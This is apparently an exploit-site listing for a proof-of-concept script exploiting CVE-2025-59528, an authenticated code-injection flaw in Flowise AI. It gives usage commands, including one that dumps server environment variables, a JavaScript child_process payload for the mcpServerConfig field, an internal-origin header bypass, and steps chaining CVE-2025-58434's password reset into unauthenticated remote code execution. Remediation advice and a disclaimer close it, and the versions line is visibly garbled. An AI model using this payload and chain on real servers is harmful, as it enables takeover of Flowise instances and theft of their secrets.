Exploit for Code Injection in Flowiseai Flowise CVE-2025-58434 CVE-2025-59528

## https://sploitus.com/exploit?id=DED4325D-1D13-5201-BF66-8F79D480002D
# CVE-2025-59528 — Flowise AI Authenticated Remote Code Execution (RCE)

## Overview

**CVE ID:** CVE-2025-59528  
**Affected Software:** Flowise AI  
**Vulnerable Versions:**  -i  -p  -c 
```

### Arguments

| Flag | Long Form | Required | Description |
|---|---|---|---|
| `-e` | `--email` | Yes | Authenticated user's email address |
| `-i` | `--url` | Yes | Base URL of the Flowise instance |
| `-p` | `--password` | Yes | Authenticated user's password |
| `-c` | `--cmd` | Yes | OS command to execute on the server |

### Examples

**Verify code execution:**
```bash
python3 CVE-2025-59528_POC.py -e user@example.com -i https://flowise.example.com -p MyP@ss -c "id"
```

**Retrieve server environment variables:**
```bash
python3 CVE-2025-59528_POC.py -e user@example.com -i https://flowise.example.com -p MyP@ss -c "env"
```

### Expected Output

```
[+] Logged in
[+] Exploit sent
[+] Status: 200
```

## Payload Breakdown

The exploit injects the following JavaScript expression into the `mcpServerConfig` field:

```javascript
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('');
    return 1;
})()})
```

- `process.mainModule.require('child_process')` — loads Node.js's built-in process execution module.
- `execSync('')` — synchronously runs the attacker-supplied OS command.
- The entire expression is wrapped in an object literal to ensure it evaluates cleanly within the server's JavaScript context.

The `x-request-from: internal` header is also appended to the request to pass an internal origin check that would otherwise block the call.

## Root Cause

The `customMCP` endpoint passes user-supplied input directly into a JavaScript evaluation context on the server without sanitization or sandboxing. Combined with unrestricted access to Node.js core modules (specifically `child_process`) via `process.mainModule.require`, this creates a trivially exploitable RCE vector. The `x-request-from` header check provides no meaningful security boundary as it is not validated against any trusted source.

## Chaining with CVE-2025-58434

These two vulnerabilities can be **chained** for an unauthenticated RCE attack path against Flowise instances running versions **<= 3.0.4**:

1. Use **CVE-2025-58434** to reset the password of any known account (no prior authentication needed).
2. Log in with the newly set credentials.
3. Use **CVE-2025-59528** to execute arbitrary OS commands on the server.

## Remediation

- **Upgrade** to Flowise AI **3.0.5 or later**, which removes or properly sandboxes the vulnerable evaluation path.
- Never evaluate user-controlled strings as code in a server-side context.
- Restrict access to dangerous Node.js modules (`child_process`, `fs`, etc.) via a proper sandbox (e.g., `vm2`, isolated contexts, or removing `process.mainModule` access).
- Validate and authenticate the `x-request-from` header through a server-side mechanism rather than a simple string check.
- Apply the principle of least privilege to the Flowise server process.

## Disclaimer

This proof of concept is provided for **educational and authorized security research purposes only**. Use of this script against systems without explicit written permission is illegal and unethical. The author and contributors assume no liability for misuse.